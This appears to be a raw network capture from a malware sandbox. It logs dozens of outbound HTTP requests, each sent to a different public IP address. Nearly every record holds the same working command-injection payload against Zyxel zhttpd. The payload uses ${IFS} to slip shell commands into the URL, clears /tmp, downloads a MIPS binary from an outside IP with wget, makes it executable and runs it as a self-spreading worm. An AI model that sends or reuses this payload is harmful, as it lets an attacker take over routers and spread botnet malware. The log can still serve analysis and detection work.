                                            Jan 14, 2024 15:50:33.307384968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2505192.168.2.2341436104.99.206.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307435036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2506192.168.2.236027686.132.153.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307452917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2507192.168.2.234420899.23.19.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307460070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2508192.168.2.235444438.161.131.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307506084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2509192.168.2.23412389.124.183.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307516098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2510192.168.2.2348368199.108.36.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307559967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2511192.168.2.2348026184.176.5.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307579994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2512192.168.2.2339942199.247.174.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307604074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2513192.168.2.2354622156.93.55.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307622910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2514192.168.2.2357956178.168.33.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307663918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2515192.168.2.2357510167.238.136.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307688951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2516192.168.2.2357128152.239.123.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307713985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2517192.168.2.2344276146.130.142.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307732105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2518192.168.2.2351228205.241.61.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307753086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2519192.168.2.2358532124.217.178.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307781935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2520192.168.2.2349076209.242.110.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307806969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2521192.168.2.2339072121.178.196.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307867050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2522192.168.2.234388034.164.217.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307898998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2523192.168.2.233349836.152.169.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307899952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2524192.168.2.235369091.232.172.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307915926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2525192.168.2.234963848.233.124.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307919025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2526192.168.2.2348450120.143.171.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307948112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2527192.168.2.2353274133.233.170.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308011055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2528192.168.2.2356268169.0.65.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308031082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2529192.168.2.2339904216.72.124.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308063984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2530192.168.2.23459365.52.1.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308095932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2531192.168.2.2359304213.199.12.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308111906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2532192.168.2.2338214132.174.155.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308155060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2533192.168.2.2339396179.189.30.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308171034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2534192.168.2.2345674184.185.20.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308206081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2535192.168.2.2334166148.108.19.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308216095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2536192.168.2.235855476.9.135.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308250904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2537192.168.2.234398273.151.51.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308259964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2538192.168.2.2335172115.19.2.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308284044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2539192.168.2.2359754149.75.123.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308314085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2540192.168.2.2345396177.177.115.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308347940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2541192.168.2.2356186211.192.34.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308366060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2542192.168.2.2338976136.168.196.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308377981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2543192.168.2.2343692157.228.252.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308407068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2544192.168.2.2353348167.137.231.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308435917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2545192.168.2.234313253.68.134.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308444023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2546192.168.2.233410880.209.153.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308476925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2547192.168.2.2349474137.165.195.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308532953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2548192.168.2.236033896.41.26.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308569908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2549192.168.2.2342166140.22.55.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308593035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2550192.168.2.2345500159.86.1.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308656931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2551192.168.2.2336702168.70.189.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308676958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2552192.168.2.235545069.221.195.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308703899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2553192.168.2.233988823.64.184.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308722973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2554192.168.2.2337252102.101.108.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308773041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2555192.168.2.2357206138.66.58.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308779001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2556192.168.2.2338570129.211.200.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308820963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2557192.168.2.2355748118.92.97.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308885098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2558192.168.2.2347408163.36.156.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308886051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2559192.168.2.234689641.192.20.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308892965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2560192.168.2.2356958223.7.84.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308924913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2561192.168.2.234774481.245.130.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.308955908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2562192.168.2.2334230213.252.150.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309003115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2563192.168.2.235482027.60.219.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309031963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2564192.168.2.233806274.62.145.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309055090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2565192.168.2.234528424.31.191.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309087038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2566192.168.2.234841043.151.209.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309127092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2567192.168.2.235544854.70.37.90443
                                            TimestampBytes transferredDirectionData
